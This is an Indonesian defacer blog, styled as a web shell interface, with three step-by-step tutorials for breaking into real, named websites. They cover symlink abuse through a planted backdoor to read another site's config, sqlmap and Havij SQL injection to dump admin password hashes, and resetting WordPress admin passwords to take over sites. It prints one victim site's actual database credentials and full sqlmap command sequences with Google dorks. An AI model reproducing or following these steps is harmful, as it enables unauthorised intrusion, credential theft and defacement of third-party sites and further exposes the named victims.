E L S E

[ Nothing Else ]
Today : |
Safemode : OFF
Disable Function : onkeydown, onselectstart, ondragstart, oncontextmenu | BYPASS
> / home / facebook / website / exit /
name author perms com modified type action
.. ELSE rwxr-xr-x - none up back
[ sqli ] ELSE rwxr-xr-x 2 none dir open
[ symlink ] ELSE rwxr-xr-x 1 none dir open

Deface Website Dengan Metode Symlink ELSE rwxr-xr-x 0 21.27 view | share | twit | gplus

Filename Deface Website Dengan Metode Symlink
Permission rw-r--r--
Author ELSE
Date and Time 21.27
Label
Action
Halo sob (^_^), kali ini saya akan berbagi cara menggunakan Symlink.
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^).

Pertama masuk ke Shell yang sudah di tanam di web target.
lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini Sob (^_^)



















Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.

Selanjutnya akses / buka symlink yang telah agan upload.


















Lalu klik user & domain & symlink.


















Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".



















Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.

Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.


















Perhatikan baris ini :
define('DB_HOST', 'localhost');

DB NAME = thefussy_wrdp3

DB USER = thefussy_wrdp3

DB PASSWORD = CZyLRz1EuwSd

DB HOST = localhost
Diatas adalah informasi mengenai Akses Database MySQL.

Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.


















Klik koneksi MySQL.

















Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.

Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.



















Lalu, saya klik "wp_user".



















Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).
Agan buat password dalam bentuk MD5 Disini Sob (^_^).


Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a





















Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.

Berarti saya akan login dengan username admin dan password 121212.
Sekarang kita coba sob (^_^). 

















Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin

Saya login & wauuuuu, kereennn sob (^_^).

Saya berhasil masuk (^_^).


















Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak (^_^)

Deface Website Dengan Metode SQL Injection SQL-MAP ELSE rwxr-xr-x 2 22.21 view | share | twit | gplus

Filename Deface Website Dengan Metode SQL Injection SQL-MAP
Permission rw-r--r--
Author ELSE
Date and Time 22.21
Label
Action
Assalamu'alaikum sob (^_^). Mungkin tutorial ini agak jadul sob wkwkwkwk, karena sudah banyak blog yang memposting nya !! tapi ngak apa-apalah , untuk mengisi blog saya , adapun tutorial sqlmap pada windows dan bada backtrack hampir sama (^_^) tetapi pada windows agan harus menginstall sqlmap dan python.





Kelebihan menggunakan SQL Map:
1. Bisa melakukan SQL Injection dengen beberapa method seperti:
- Boolean-Based Blind SQL Injection
- Time-Based Blind SQL Injection
- Error-Based SQL Injection
- UNION Query SQL Injection
- Stacked Query SQL Injection
2. Bisa berjalan baik untuk beberapa jenis database seperti:
- MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase &SAP MaxDB

Langsung saja buka marinecyber sqli scanner di sini dan tulis google dork di kolumn yang tersedia , kalau google dork nya agan bisa lihat di sini atau di sini , dalam contoh ini saya menggunakan dork "inurl:opinions.php?id="



  • pilih salah satu situs target nya disini saya menggunakan situs di bawah ini
Found : http://golosdoma2.com/opinions.php?id='21 <-- SQLI Vuln Found..





klik ajah link tersebut , dan saya melihat 



Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/users1/v/victarius/domains/golosdoma2.com/opinions.php on line 25

Bahwa situs tersebut memilki bug , dan insyaallah bisa di masuki sob (^_^)

  • buka command prompt ketik " cd C:\Users\BL4CK_3YE116\Desktop\sqlmap " tanpa tanda petik , directory C:\Users\BL4CK_3YE116\Desktop\sqlmap merupakan directory folder tempat sqlmap berada

  • setelah itu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) di sini saya menggunakan situs http://golosdoma2.com/opinions.php?id=22 , dan saya mengetik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 untuk scan situs tersebut

  • lalu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) --dbs disini saya menggunakan sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 --dbs , untuk melihat database situs tersebut

Saya menemukan  information_schema dan victarius

  • saya menggunakan database " victarius " lalu sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius --tables untuk melihat tables dari database tersebut



Saya menemukan table wp_users yang menurut saya menarih , :) hehehe

  • setelah itu ketik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users --column , untuk melhat  column dari tables tersebut , lalu muncul

Saya pilih column ID,user_login,user_pass yang menurut saya menarik (^_^)

  • dump column tersebut dengan cara sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users -C ID,user_login,user_pass --dump , lalu muncul dah



Password tersebut adalah MD5 wordpress , dan setahu saya ngak bisa di crack ! :( tapi dalam sqlmap ada tools untuk menebak jenis password tersebut dengan dictionary yang ada :) untuk melihat definisi dan jenis hash bisa di lihat di sin

Tambahan :

Biar lengkap saya kasih step-stepnya:
  • Test injeksi dengan men-fetch banner mysql (versi mysql)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --banner
  • Fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db), langkah ini ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --current-user --current-db
  •   Fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (–dbs)
Dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi. ./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --dbs
  • Fetch list tables di database portal dengan flag (-D nama_tabel –tables)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel --tables
  • Fetch isi kolum pada setiap tables dengan flag (–columns)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel  -T nama_kolom --columns
  •  Sekarang kita akan men-fetch hanya isi dari kolum dengan flag (-D nama_tabel -T kolom -C isi_kolom1,isi_kolom2 –dump)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel  -T nama_kolom -C isi_kolom1,isi_kolom2 --dump

agan juga bisa menggunakan tools online marinecyber untuk memudahkan agan ,, tools hack di sini , saya menyediakan adminfinder scanner dan sqli scanner
sampai di sin saja saya mohon maaf jika ada salah kata , berhubung saya hanyalah seorang newbie yang ingin mencoba (^_^)

Deface Website Dengan Metode SQL Injection HAVIJ ELSE rwxr-xr-x 0 22.15 view | share | twit | gplus

Filename Deface Website Dengan Metode SQL Injection HAVIJ
Permission rw-r--r--
Author ELSE
Date and Time 22.15
Label
Action
Oke, kali ini saya akan memberikan tutorial tentang bagaimana cara mendeface website dengan havij SQL Injection
Tool havij sendiri fungsinya memang untuk sql injection, jadi kita tidak perlu capek2 untuk inject manual. cukup dengan klik klik langsung beres deh.

Tool ini juga cukup apik, karena sudah disertakan md5 cracker, admin finder dll.
Tool havij yg saya gunakan disini adalah versi 1.10. Bagi yang belum punya tool havij silahkan download :



Bagi yg sudah mahir menggunakan tool ini, pasti sudah tahu dan lewat saja. Namun bagi yang belum pernah mencoba pasti bingung. Simak baik-baik tutorial ini. Langsung saja kita menuju ke TKP.

1. Cari Targetnya dulu dengan dork: berita.php?id=100
Disini saya sudah mendapatkan target yaitu:
http://www.thenaturalbabyco.com/product.php?pID=100032
2. Kemudian buka tool havij kalian, dan masukan url korban dimenu TARGET. Lihat sperti gambar berikut:


3. Setelah itu klik ANALIZE. Tunggu beberapa saat. nah, setelah selesai dan sudah dianalyze, maka akan muncul informasi server target dan yang terpenting adalah nama databasenya. Simak gambar dibawah ini:


4. Sekarang tinggal mencari tabelnya. klik tabel. dan klik GET TABLES simak gambar dibawah ini:


5. Setelah nama-nama tabelnya sudah keluar, sekarang saatnya mencari kolom. Pilih salah satu tabel dengan menchecklistnya lalu klik GET COLUMNS. Simak gambar dibawah ini:


6. Setelah columns dari tabelnya sudah keluar, maka langkah terakhir adalah dump isinya. Saya disini akan mengedump tabel administrator, yang didalamnya terdapat columns username dan password. checklist kolom mana yg ingin didump lalu klik GET DATA. Contoh lihat gambar dibawah ini:


Oke, kita sudah dapat username dan passwordnya. sekarang tinggal mendecrypt passwordnya dan mencari admin pagenya.


  • Untuk mendecrypt password bisa dilakukan ditab md5 lalu masukan passwordnya dan klik Start.



  • Untuk mencari admin page nya bisa dilakukan ditab Find Admin setelah itu masukan url korban dan klik Start.


  • Nanti akan muncul halaman adminnya. Misalnya tidak muncul bisa menggunakan alternatif lain sperti mencari admin page dengan Admin Finder. Untuk admin finder dapat dicek disini: http://tool.suramz.com/adminfb.php Atau cari ditempat lain.

    Kalau misalnya adminnya tidak ketemu juga, anda bisa menscannya dengan tool Acunetix. kalau tidak dapat juga. Silahkan pasrah dan cari target lain.

    Alternatif lain/tempat mendecrypt password juga ada banyak. Silahkan search di google. Atau bisa juga decrypt disini: www.md5decrypter.co.uk
     

    Jayalah Indonesiaku © 2015 Newbie Defacer
    Shell Template Design By ELSE